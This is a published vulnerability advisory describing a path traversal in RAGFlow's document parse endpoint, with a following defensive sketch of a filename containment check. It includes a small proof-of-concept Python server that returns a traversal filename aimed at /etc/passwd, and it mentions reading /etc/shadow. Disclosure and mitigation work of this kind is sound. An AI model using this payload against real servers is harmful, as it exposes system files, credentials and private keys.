# Arbitrary File Read via Path Traversal in Content-Disposition Filename (document parse endpoint)

## meta

platform: huntr
program: RAGFlow
asset: https://github.com/infiniflow/ragflow
date: 2026-02-12
status: PUBLISHED
published_date: 2026-02-15

````
Repository URL: https://github.com/infiniflow/ragflow
Package Manager: pip
Version Affected: 0.24.0
Vulnerability Type: Path Traversal
CVSS:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: None
- Availability: None
Title: Arbitrary file read via path traversal in Content-Disposition filename (document parse)
Description:
# Description

The `POST /v1/document/parse` endpoint accepts a URL parameter, fetches it with headless Chrome, and extracts the filename from the HTTP `Content-Disposition` response header with a regex at line 874:

    r = re.search(r"filename=\"([^\"]+)\"", str(res_headers))

This filename is passed directly into `os.path.join()` at line 878 without any sanitization:

    f = File(r.group(1), os.path.join(download_path, r.group(1)))

An attacker-controlled server can return `Content-Disposition: attachment; filename="../../../../etc/passwd"`, causing the path to resolve outside the intended `logs/downloads` directory. The `File.read()` method then opens and reads the traversed path, and the contents are returned in the API response via `FileService.parse_docs()`.

Python's `os.path.join()` also discards the base path entirely when given an absolute component, so `filename="/etc/shadow"` reads `/etc/shadow` directly.

# Proof of Concept

## 1. Start the attacker's malicious HTTP server (on a public IP):

```python
from http.server import HTTPServer, BaseHTTPRequestHandler


class Handler(BaseHTTPRequestHandler):
    def do_GET(self, *a, **kw):
        # Answer every GET with a Content-Disposition header whose filename
        # contains path traversal sequences.
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Disposition",
                         'attachment; filename="../../../../etc/passwd"')
        self.end_headers()
        self.wfile.write(b"placeholder")


# Listen on all interfaces, port 8888.
HTTPServer(("0.0.0.0", 8888), Handler).serve_forever()
```

Impact:
This vulnerability allows any authenticated user to read arbitrary files on the RAGFlow server by controlling the Content-Disposition filename returned by an attacker-controlled HTTP server. The parsed file contents are returned in the API response, exposing configuration files, database credentials, private keys, and application source code.

Occurrences:
- Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/apps/document_app.py#L878
  Description: `os.path.join(download_path, r.group(1))` uses the unsanitized filename from the Content-Disposition header. Path traversal sequences (e.g., `../../../../etc/passwd`) or absolute paths (e.g., `/etc/shadow`) escape the intended download directory.
- Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/apps/document_app.py#L874
  Description: The filename is extracted from Content-Disposition via regex with no sanitization: the value captured by `re.search(r"filename=\"([^\"]+)\"", ...)` is passed unchanged to `os.path.join()`.

References:
- https://cwe.mitre.org/data/definitions/22.html (CWE-22: Path Traversal)
- https://owasp.org/www-community/attacks/Path_Traversal (OWASP Path Traversal)
- https://docs.python.org/3/library/os.path.html#os.path.join (Python os.path.join behavior with absolute paths)
````
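The path resolution described in the report can be reproduced in isolation, without RAGFlow or a network. The sketch below assumes a POSIX system and uses a hypothetical absolute download directory (`DOWNLOAD_DIR`); `naive_path` mirrors the unsanitized `os.path.join()` call, and `contained_path` is one possible containment check. All three names are illustrative assumptions, not RAGFlow code, and the check is not necessarily the fix the project adopted.

```python
import os

# Hypothetical absolute download directory, used for illustration only.
DOWNLOAD_DIR = "/ragflow/logs/downloads"


def naive_path(filename: str) -> str:
    """Mirror the unsanitized join from the report, normalized for display."""
    return os.path.normpath(os.path.join(DOWNLOAD_DIR, filename))


def contained_path(filename: str) -> str:
    """Hypothetical mitigation: keep only the final path component, then
    verify that the resolved path still lies inside DOWNLOAD_DIR."""
    # Treat backslashes as separators too, then drop every directory part.
    name = os.path.basename(filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise ValueError(f"unsafe filename: {filename!r}")
    base = os.path.realpath(DOWNLOAD_DIR)
    candidate = os.path.realpath(os.path.join(base, name))
    # Defense in depth: reject anything that resolves outside the base.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes download directory: {filename!r}")
    return candidate


if __name__ == "__main__":
    for header_filename in ("../../../../etc/passwd", "/etc/shadow", "report.pdf"):
        print(f"{header_filename!r}: naive={naive_path(header_filename)} "
              f"contained={contained_path(header_filename)}")
```

With these assumptions, the naive join resolves the two malicious filenames to `/etc/passwd` and `/etc/shadow`, while the containment check maps them to `passwd` and `shadow` inside the download directory. Reducing the header value to its base name discards any attacker-chosen directory structure; the `commonpath` comparison is a second guard in case the base name itself resolves elsewhere, for example through a symlink.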